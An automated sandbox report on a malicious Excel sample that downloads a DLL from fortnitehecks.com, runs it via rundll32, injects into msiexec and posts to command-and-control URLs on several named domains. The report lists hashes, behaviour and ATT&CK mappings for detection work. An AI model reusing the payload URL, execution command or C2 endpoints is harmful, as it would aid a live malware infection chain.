Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ekduh\mae.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll			Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe TID: 2848

Thread sleep time: -300000s >= -30000s

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8769A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_6E8769A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E86D830 LoadLibraryA,GetProcAddress,

4_2_6E86D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E872EF0 mov eax, dword ptr fs:[00000030h]	4_2_6E872EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8A47A1 mov eax, dword ptr fs:[00000030h]	4_2_6E8A47A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8A42DE push dword ptr fs:[00000030h]	4_2_6E8A42DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8A46D7 mov eax, dword ptr fs:[00000030h]	4_2_6E8A46D7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000A2EF0 mov eax, dword ptr fs:[00000030h]	5_2_000A2EF0

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E86AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

4_2_6E86AE40

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior

Source: msiexec.exe, 00000005.00000002.2359401365.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000005.00000002.2359401365.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000005.00000002.2359401365.0000000000D40000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E861A00 CreateDialogParamW,GetVersion,

4_2_6E861A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	System Information Discovery14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
case (426).xls	0%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.6e860000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
5.2.msiexec.exe.90000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

Source	Detection	Scanner	Link
groceryasian.com	0%	Virustotal	Browse
conssapratigdevi.tk	0%	Virustotal	Browse
fortnitehecks.com	0%	Virustotal	Browse
forteanhub.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://groceryasian.com/	0%	Avira URL Cloud	safe
https://conssapratigdevi.tk/My	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl3.digicep	0%	Avira URL Cloud	safe
https://conssapratigdevi.tk/post.php	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://conssapratigdevi.tk/hy	0%	Avira URL Cloud	safe
https://groceryasian.com/post.php	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://conssapratigdevi.tk/post.phpad	0%	Avira URL Cloud	safe
https://forteanhub.com/post.php	0%	Avira URL Cloud	safe
https://forteanhub.com/	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://crl3.digice	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://groceryasian.com/post.phpx6	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
groceryasian.com	172.67.209.71	true	false	0%, Virustotal, Browse	unknown
conssapratigdevi.tk	172.67.152.74	true	false	0%, Virustotal, Browse	unknown
fortnitehecks.com	104.21.23.220	true	false	0%, Virustotal, Browse	unknown
forteanhub.com	104.21.86.32	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	false		high
https://groceryasian.com/	msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false		high
https://conssapratigdevi.tk/My	msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl3.digicep	msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://conssapratigdevi.tk/post.php	msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp, msiexec.exe, 00000005.00000002.2359298919.0000000000801000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	false		high
https://conssapratigdevi.tk/hy	msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://groceryasian.com/post.php	msiexec.exe, 00000005.00000003.2162646677.0000000000846000.00000004.00000001.sdmp, msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	msiexec.exe, 00000005.00000002.2359491430.0000000002140000.00000002.00000001.sdmp	false		high
https://conssapratigdevi.tk/post.phpad	msiexec.exe, 00000005.00000002.2359298919.0000000000801000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://forteanhub.com/post.php	msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp, msiexec.exe, 00000005.00000003.2164985906.0000000000835000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://forteanhub.com/	msiexec.exe, 00000005.00000002.2359339550.000000000084E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	msiexec.exe, 00000005.00000002.2359491430.0000000002140000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl3.digice	msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://groceryasian.com/post.phpx6	msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.152.74	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.209.71	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.86.32	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.23.220	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	343285
Start date:	22.01.2021
Start time:	17:24:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	case (426).xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@7/12@5/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 69.6% (good quality ratio 69.2%) Quality average: 89.5% Quality standard deviation: 19.2%
HCA Information:	Successful, ratio: 85% Number of executed functions: 41 Number of non-executed functions: 21
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:25:12	API Interceptor	1219x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.152.74	case (61).xls	Get hash	malicious	Browse
172.67.152.74	case (61).xls	Get hash	malicious	Browse
172.67.209.71	case (61).xls	Get hash	malicious	Browse
104.21.86.32	case (61).xls	Get hash	malicious	Browse
104.21.23.220	case (61).xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
groceryasian.com	case (61).xls	Get hash	malicious	Browse	104.21.85.189
groceryasian.com	case (61).xls	Get hash	malicious	Browse	172.67.209.71
forteanhub.com	case (61).xls	Get hash	malicious	Browse	172.67.214.102
forteanhub.com	case (61).xls	Get hash	malicious	Browse	104.21.86.32
conssapratigdevi.tk	case (61).xls	Get hash	malicious	Browse	172.67.152.74
conssapratigdevi.tk	case (61).xls	Get hash	malicious	Browse	172.67.152.74
fortnitehecks.com	case (61).xls	Get hash	malicious	Browse	172.67.213.245
fortnitehecks.com	case (61).xls	Get hash	malicious	Browse	104.21.23.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	case (61).xls	Get hash	malicious	Browse	172.67.214.102
	case (61).xls	Get hash	malicious	Browse	104.21.23.220
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	23.227.38.74
	file.exe	Get hash	malicious	Browse	104.21.19.200
	2531 2212 2020 QG-826729.doc	Get hash	malicious	Browse	172.67.199.174
	IMG_9501.EXE	Get hash	malicious	Browse	172.67.188.154
	Arch 30 S_07215.doc	Get hash	malicious	Browse	104.21.84.115
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	104.22.68.109
	SecuriteInfo.com.Trojan.PackedNET.507.9142.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	104.21.84.118
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.47.92
	Info-237-602317.doc	Get hash	malicious	Browse	172.67.146.96
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	104.23.98.190
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	172.67.157.219
	433.doc	Get hash	malicious	Browse	104.21.4.38
	69WGZvg6P8.exe	Get hash	malicious	Browse	172.67.188.154
	118.apk	Get hash	malicious	Browse	104.18.226.52
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	104.21.19.200
CLOUDFLARENETUS	case (61).xls	Get hash	malicious	Browse	172.67.214.102
	case (61).xls	Get hash	malicious	Browse	104.21.23.220
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	23.227.38.74
	file.exe	Get hash	malicious	Browse	104.21.19.200
	2531 2212 2020 QG-826729.doc	Get hash	malicious	Browse	172.67.199.174
	IMG_9501.EXE	Get hash	malicious	Browse	172.67.188.154
	Arch 30 S_07215.doc	Get hash	malicious	Browse	104.21.84.115
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	104.22.68.109
	SecuriteInfo.com.Trojan.PackedNET.507.9142.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	104.21.84.118
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.47.92
	Info-237-602317.doc	Get hash	malicious	Browse	172.67.146.96
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	104.23.98.190
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	172.67.157.219
	433.doc	Get hash	malicious	Browse	104.21.4.38
	69WGZvg6P8.exe	Get hash	malicious	Browse	172.67.188.154
	118.apk	Get hash	malicious	Browse	104.18.226.52
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	104.21.19.200
CLOUDFLARENETUS	case (61).xls	Get hash	malicious	Browse	172.67.214.102
	case (61).xls	Get hash	malicious	Browse	104.21.23.220
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	23.227.38.74
	file.exe	Get hash	malicious	Browse	104.21.19.200
	2531 2212 2020 QG-826729.doc	Get hash	malicious	Browse	172.67.199.174
	IMG_9501.EXE	Get hash	malicious	Browse	172.67.188.154
	Arch 30 S_07215.doc	Get hash	malicious	Browse	104.21.84.115
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	104.22.68.109
	SecuriteInfo.com.Trojan.PackedNET.507.9142.exe	Get hash	malicious	Browse	172.67.188.154
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	104.21.84.118
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.47.92
	Info-237-602317.doc	Get hash	malicious	Browse	172.67.146.96
	Enq No 34 22-01-2021.exe	Get hash	malicious	Browse	104.23.98.190
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	104.21.14.53
	8776139.docm	Get hash	malicious	Browse	172.67.157.219
	433.doc	Get hash	malicious	Browse	104.21.4.38
	69WGZvg6P8.exe	Get hash	malicious	Browse	172.67.188.154
	118.apk	Get hash	malicious	Browse	104.18.226.52
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	104.21.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	case (61).xls	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	USD_ Payment Schedule.xls	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	8776139.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	8776139.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7375568.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	6213805.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7375568.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	6213805.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	invoice 2021.xlsx	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1374623.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7653684.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1403181.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1374623.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	7653684.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1403181.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	2736760.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	2736760.docm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1_Total New Invoices-Thursday January 21_2021.xlsm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	Enquiry 2021.ppt	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220
	1 Total New Invoices-Thursday January 21 2021.xlsm	Get hash	malicious	Browse	172.67.152.74 104.21.86.32 172.67.209.71 104.21.23.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\OneNote.dll	case (61).xls	Get hash	malicious	Browse
C:\ProgramData\OneNote.dll	case (61).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll	case (61).xls	Get hash	malicious	Browse
	case (61).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Ekduh\mae.dll	case (61).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Ekduh\mae.dll	case (61).xls	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\OneNote.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	279040
Entropy (8bit):	6.822417966790041
Encrypted:	false
SSDEEP:	6144:1/oqv+z4/KDhYxNzQkR6sfPliEC3iNEt0Filb0ilBQY+Wj:1/dv+z45QkRZfPlTC3iNbFcoiTbj
MD5:	7CFF1113D30B8E4CD51BA13F40B9D2D5
SHA1:	6A0B90E9B0861CB42FECD217651D25C2E9EABF7D
SHA-256:	5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
SHA-512:	2A9420971587E2234DB54A5008C9A861C337DFCBEB94698FD04A5E0481794F5CC510D81A6548BBB9F0B2A024A31D46A954768A0E8F6B0DD19CF7602A284D4862
Malicious:	true
Joe Sandbox View:	Filename: case (61).xls, Detection: malicious, Browse Filename: case (61).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e\|.6!..e!..e!..e,O;e;..e,O.e6..e,O:eJ..e...e$..e!..en..e,O?e ..e,O.e ..e,O.e ..e,O.e ..eRich!..e........PE..L...r..T...........!.....b...v.......$....................................................@.............................s...D...P....... .......................<...p...8...............................@............... ............................text....a.......b.................. ..`.rdata...............f..............@..@.data....... ......................@....rsrc... ...........................@..@.reloc..<............*..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	279040
Entropy (8bit):	6.822417966790041
Encrypted:	false
SSDEEP:	6144:1/oqv+z4/KDhYxNzQkR6sfPliEC3iNEt0Filb0ilBQY+Wj:1/dv+z45QkRZfPlTC3iNbFcoiTbj
MD5:	7CFF1113D30B8E4CD51BA13F40B9D2D5
SHA1:	6A0B90E9B0861CB42FECD217651D25C2E9EABF7D
SHA-256:	5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
SHA-512:	2A9420971587E2234DB54A5008C9A861C337DFCBEB94698FD04A5E0481794F5CC510D81A6548BBB9F0B2A024A31D46A954768A0E8F6B0DD19CF7602A284D4862
Malicious:	true
Joe Sandbox View:	Filename: case (61).xls, Detection: malicious, Browse Filename: case (61).xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://fortnitehecks.com/kev/xeda.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e\|.6!..e!..e!..e,O;e;..e,O.e6..e,O:eJ..e...e$..e!..en..e,O?e ..e,O.e ..e,O.e ..e,O.e ..eRich!..e........PE..L...r..T...........!.....b...v.......$....................................................@.............................s...D...P....... .......................<...p...8...............................@............... ............................text....a.......b.................. ..`.rdata...............f..............@..@.data....... ......................@....rsrc... ...........................@..@.reloc..<............*..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A2EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	59772
Entropy (8bit):	7.76847204023052
Encrypted:	false
SSDEEP:	768:SwgBP+IOXMOe4viH/WoTXZSzrSZpYwstXEtdd9iS2F0lN:SwUWIuviH/WaIYew9om
MD5:	C39277958537554DA5E34547F98102AE
SHA1:	B42761637F9A9A6DFE671506296E6DAD5693E4D2
SHA-256:	C26F8DB1E2265C27BD5E3E50EFFB92A2D138FE5E472E188F656770912495F658
SHA-512:	E757EB225B1DC12F3063DCDF93371A5247861CD39F8571319E0B760F26F3AE064B27D54F6CF594BC3B1819EEAF4F809F4131BCADA5CCC0052D0E72C93D04C260
Malicious:	false
Reputation:	low
Preview:	..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..\|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r\|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a..BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{\|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................

